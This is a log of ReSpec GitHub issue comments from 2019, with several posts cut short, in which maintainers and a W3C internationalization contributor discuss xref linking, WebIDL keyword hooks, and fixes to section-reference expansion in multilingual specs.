@saschanaz I can try to work from `reference()` and see how I go. I'll draft something up, but would appreciate your guidance.

[2019-04-29 05:05] marcoscaceres commented on #2317
Making a note that https://github.com/w3c/respec/issues/1917 is related... in as far as it adds a bunch of needless spans that could be on the elements themselves in most cases.

[2019-04-29 11:08] marcoscaceres opened #2318 "Misleading xref error message"
given, for instance:

[code]

We get the following error:

This has two issues:

 1. It's showing "performance" in normalized form... should be "Performance".
 2. "to any other spec" is misleading. It should say "to any cited document in this specifications: ... list of specs cited..."

The second would help the Editor further realize that they are missing a data-cite for wherever Performance is d

[2019-04-29 12:41] marcoscaceres commented on #2317
Ok, scary bit... to achieve this, we need to enable xref on all W3C specs. Are we ready? Should we just deal with the fallout?

I have something working locally, and it’s pretty awesome: all webIDL types now link.

[2019-04-29 12:45] saschanaz commented on #2317
Maybe we can just enable the strictness for who opts-in xref thing?

[2019-04-29 13:02] marcoscaceres commented on #2317
We could, but would mean many code paths. I’d rather just move people. ReSpec’s current citation model is actually harmful to the web 😢 I’ve realized this as I’ve been increasingly using xref and migrating specs.

Having said that, xref is backwards compatible, so I don’t think too many specs will be affected. Those affected will be ones that have bugs already (e.g., the one you linked to above).

[2019-04-29 13:05] marcoscaceres commented on #2317
(Harmful in that one can cite definitions  that are not exported from other specs... which is bad)

[2019-04-30 03:03] marcoscaceres opened #2321 "should maplike be passed to `reference()`?"
@saschanaz, not sure this is right, but I think `maplike` should be passed to the `reference()` template handler (same way that sequence, record, and Promise are passed). I can then link "maplike" to the WebIDL spec via the template.

[2019-04-30 03:04] marcoscaceres commented on #2321
For reference, this is what I'm working on:

[code]

It works nicely for everything except `maplike` :) ... is there others?

[2019-04-30 03:12] saschanaz commented on #2321
Thing is that they are syntactic keywords rather than general IDL identifiers. `maplike`/`setlike`/`iterable` are not even type names. I'd like to add a new hook for those syntactic things (mainly to link anonymous getters from the keyword `getter`), but not sure what would be the best name.

`keyword()` would work but then why some keywords but not others? 🤔

[2019-04-30 03:14] marcoscaceres commented on #2321
heh, see also "Promise object" 😂😭

[2019-04-30 03:17] marcoscaceres commented on #2321
`keyword()` would be fine... it's really up to us to classify them.

[2019-04-30 03:19] saschanaz commented on #2321
Yeah... we can pass `Promise` but we cannot pass `maplike` as an argument 😁

I think `generic()` (as a syntactic form) and `modifier` might work.

[2019-04-30 03:20] marcoscaceres commented on #2321
I'm happy with whatever you think is best.

[2019-04-30 03:21] saschanaz commented on #2321
Okay, I'll go `generic()` first and `modifier()` later.

[2019-04-30 03:32] marcoscaceres commented on #2321
Ok, does this look right then?:

[code]
[code]

[2019-04-30 03:33] marcoscaceres commented on #2321
oops, let me fix the above.

[2019-04-30 03:35] saschanaz commented on #2321
I'll go `generic()` for generic-like syntactic forms include `maplike`, and `modifier()` for `getter`, `stringifier` etc.

[2019-04-30 10:03] r12a commented on #2131
@marcoscaceres i'm not familiar with the process steps between merging the fix and landing it. Do you have an idea about how soon i'll be able to use this in a live document?  I ask because i'm make a large format-related edit to JLREQ at the moment, and it would be convenient to make this change at the same time.

[2019-04-30 10:04] marcoscaceres commented on #2131
Generally, we release within an hour or two. So this is out :)

[2019-04-30 10:05] r12a commented on #2131
Ah! I'll try it again. Thanks.

[2019-04-30 10:07] marcoscaceres commented on #2131
Make sure you are on the latest version (24.21.0):

![Screenshot 2019-04-30 20 06 29](https://user-images.githubusercontent.com/870154/56954962-79cee200-6b83-11e9-87fc-9aab0788b28f.png)

[2019-04-30 10:12] r12a commented on #2131
I seem to be on 24.21.0, but i can't figure out how to get the latest version. Any tips? (I tried shift-refresh).

[2019-04-30 11:01] marcoscaceres commented on #2131
@r12a, could you put up the spec somewhere? Happy to have a look.

[2019-04-30 11:06] r12a commented on #2131
Thanks @marcoscaceres.  I uploaded a version of the file with a couple of [[[#...]]] items in it.  One is under (b) at https://w3c.github.io/jlreq/temporary_bilingual_devt/#basic-principles-for-development-of-this-document

[2019-04-30 11:19] marcoscaceres commented on #2131
Thanks! having a look at what's going on...

[2019-04-30 11:24] marcoscaceres commented on #2131
Um, embarrassing... missed "_" in the relevant regex 🙀 @r12a, will fix when I get home unless someone else beats me to it!

[2019-04-30 11:26] r12a commented on #2131
Phew! Thank goodness it's not just me being stupid then :-).  Thanks for your help.  I'll stand by for news.

[2019-04-30 11:30] marcoscaceres commented on #2131
@r12a we will have to see how it plays with the its-locale-filter-list. I think it should be ok... but will need to check if we are cloning those nodes so it retains the its-locale-filter-list information.

[2019-04-30 11:31] marcoscaceres commented on #2131
Reduced test case:
[code]

[2019-04-30 11:42] r12a commented on #2131
Note, btw, that it doesn't work on [[[#kanji-hiragana-and-katakana]]] either. Also, fwiw, i tried to get it working on a different document, a few days ago, with the same result.

[2019-04-30 11:48] marcoscaceres commented on #2131
@r12a with the `its-locale-filter-list`, is the expectation that those `span`s be available inside the generated text? I'm guessing yes.

[2019-04-30 12:06] r12a commented on #2131
Yes, indeed.

[2019-04-30 12:08] marcoscaceres commented on #2131
Ok, right now, we are pulling the titles as plain text out of a look-up table... I'll need to do a little refactoring to make sure we clone the the nodes instead.

[2019-04-30 12:08] r12a commented on #2131
And other markup, too, such as bidi- or language-related markup, should also be preserved. (And that may include other tags than just span, such as bdi, etc.)

[2019-04-30 12:10] marcoscaceres commented on #2131
@r12a, make the changes as needed and I'll use your document to make sure it works. I'll keep you posted on progress.

[2019-04-30 13:10] r12a commented on #2131
Ok, i uploaded a few more changes for your testing.  I'm finding that if there's no _, i get `<a href="#introduction"></a>` as output (ie. no link text).  There are a few section references and a few figure references included in the conversions, near the start of the doc. (I didn't convert all yet, since there's well over 1,000 in total.)

[2019-04-30 14:04] marcoscaceres opened #2324 "Treat IDL as case sensitive"
Linking webidl things and generated linking terms should be case sensitive.

[2019-05-01 04:43] #2182 closed

[2019-05-01 12:17] Swapnilr1 commented on #2313
Working on it. Also found a minor rendering issue with Firefox.

![firefox](https://user-images.githubusercontent.com/35957512/57016636-c32d3900-6c38-11e9-9599-481e4a9ac6f4.png)

Yup - even when working on a desktop, it took me some time to figure out I am supposed to click on the 3 dots on the top left to open the MDN pill.

[2019-05-02 12:59] r12a commented on #2131
hi @marcoscaceres I'm now seeing no difference between behaviour for ids with underscore than for other ids  However, respec isn't producing anything visible for these links. See for example, https://w3c.github.io/jlreq/temporary_bilingual_devt/#the-structure-of-this-document  Just wanted to make sure that you're aware.  Ignore this if you are.

[2019-05-02 13:03] marcoscaceres commented on #2131
Hi @r12a, was just about to message you to give you a brief update. So, yes, we fixed and shipped the "_" handling (what you are currently seeing), and I'm currently working on cloning the nodes in the expansions. I have it working locally, but it has caused a few regressions, so I'm currently working on fixing those.

<img width="553" alt="Screen Shot 2019-05-02 at 11 02 34 PM" src="https://user-

[2019-05-02 13:10] r12a commented on #2131
Cool.

Btw, i think it would be useful, if you agree, to add standard class names to the resulting markup when a link replaces [[[...]]].  For example, class="secref" or class="figref", etc.  The reason for that is that we may want to style the resulting links differently (esp. in certain languages).  Just a suggestion.

[2019-05-02 13:14] marcoscaceres commented on #2131
Good suggestion. We currently add 'sec-ref' for section references, so will make sure to do the same for the other types.

[2019-05-02 18:16] r12a commented on #2131
There were a couple of other things i was thinking about related to language and directionality of the source of the reference text.

These things are not really relevant to the jlreq doc we are using for testing, because the structure used to support the multilingual nature of the content creates language-specific spans inside a heading which declare language (and could declare direction) as need

[2019-05-02 22:03] marcoscaceres commented on #2131
Thanks for the additional info.

It should be trivial to derive the `dir` and lang from tree order (based on the matched element), so will definitely add that.

[2019-05-03 04:51] marcoscaceres commented on #2131
@r12a, sent a PR that supports that does that clones the nodes and also applies dir/lang, based the document you sent me.

It's likely that I might have overlooked something (as I'm not accustomed to looking at multilingual documents), but we can iterate on it if I've missed anything.

[2019-05-03 05:05] r12a commented on #2131
@marcoscaceres is there a way i can test this before you make it live?  (I'm not sure i'll grok everything just looking at the source code.)

[2019-05-03 05:11] marcoscaceres commented on #2131
@r12a, I'll put a build somewhere... brb.

[2019-05-03 05:15] marcoscaceres commented on #2131
Try:
https://raw.githubusercontent.com/marcoscaceres/playground/gh-pages/respec-w3c.js

[2019-05-03 05:25] marcoscaceres commented on #2131
A few things from the document:

 * id "kanji-hiragana-and-katakana" is missing.
 * you have:

[code]

Which I'm unsure how to expand.

[2019-05-03 05:34] r12a commented on #2131
kanji-hiragana-and-katakana is a strange thing. https://w3c.github.io/jlreq/#kanji-hiragana-and-katakana takes you to a section, even though respec doesn't like the link. Haven't figured out why, but i also left that in to check the error msg worked.

For term.illustrations, i think i need to make that an ordinary link. (It probably should use dfn, but this is old code.)

Looking at the results my

[2019-05-03 05:43] marcoscaceres commented on #2131
Ah, with "kanji-hiragana-and-katakana", I think it's because the id is not set explicitly in the document? I think adding the id explicitly should fix that.

I think that would be best... expanding the table row into something meaningful might be somewhat arbitrary.

About 3, I need some guidance there. Those are indeed getting all screwed up, so we probably need to localize those properly when th

[2019-05-03 05:47] r12a commented on #2131
I'll add the content of my article draft to the test file i'm using, and see if i can glean anything useful.  It will probably take me a while, although i suspect it might be very late for you by now (and quite early for me).  So you may not hear much from me for a while, but i'll be working on it as time allows.

[2019-05-03 05:48] r12a commented on #2131
Btw, if it's easier, we can chat on IRC using the #i18n channel.

[2019-05-03 16:11] r12a commented on #2131
[discussion continued on IRC]

Here is a draft set of recommendations for modelling the markup for links to headings and figures: http://w3c.github.io/i18n-drafts/questions/qa-reference-links.html

[2019-05-04 09:06] #2313 closed

[2019-05-04 11:38] #2131 closed

[2019-05-04 15:54] saschanaz commented on #2324
Possibly also #893

[2019-05-04 23:21] mkovatsc opened #2328 "Internal References broken by last update (24.21.2)"
## Important info

* URL to affected spec: any Editor's Draft on github.io (e.g., https://w3c.github.io/wot-architecture/ or https://w3c.github.io/json-ld-syntax/)
* ReSpec version: 24.21.2
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?:

* Only the first internal reference with `<a href="#..."></a>` is rendered as "§ X. ..."
* Al

[2019-05-05 00:40] marcoscaceres opened #2329 "Double "!!" in warning"
When a normative reference is inside an informative section, the warning contains two "!!"
<img width="421" alt="Screenshot 2019-05-05 10 38 47" src="https://user-images.githubusercontent.com/870154/57186418-2e6d5880-6f22-11e9-9a65-8a5d9268f273.png">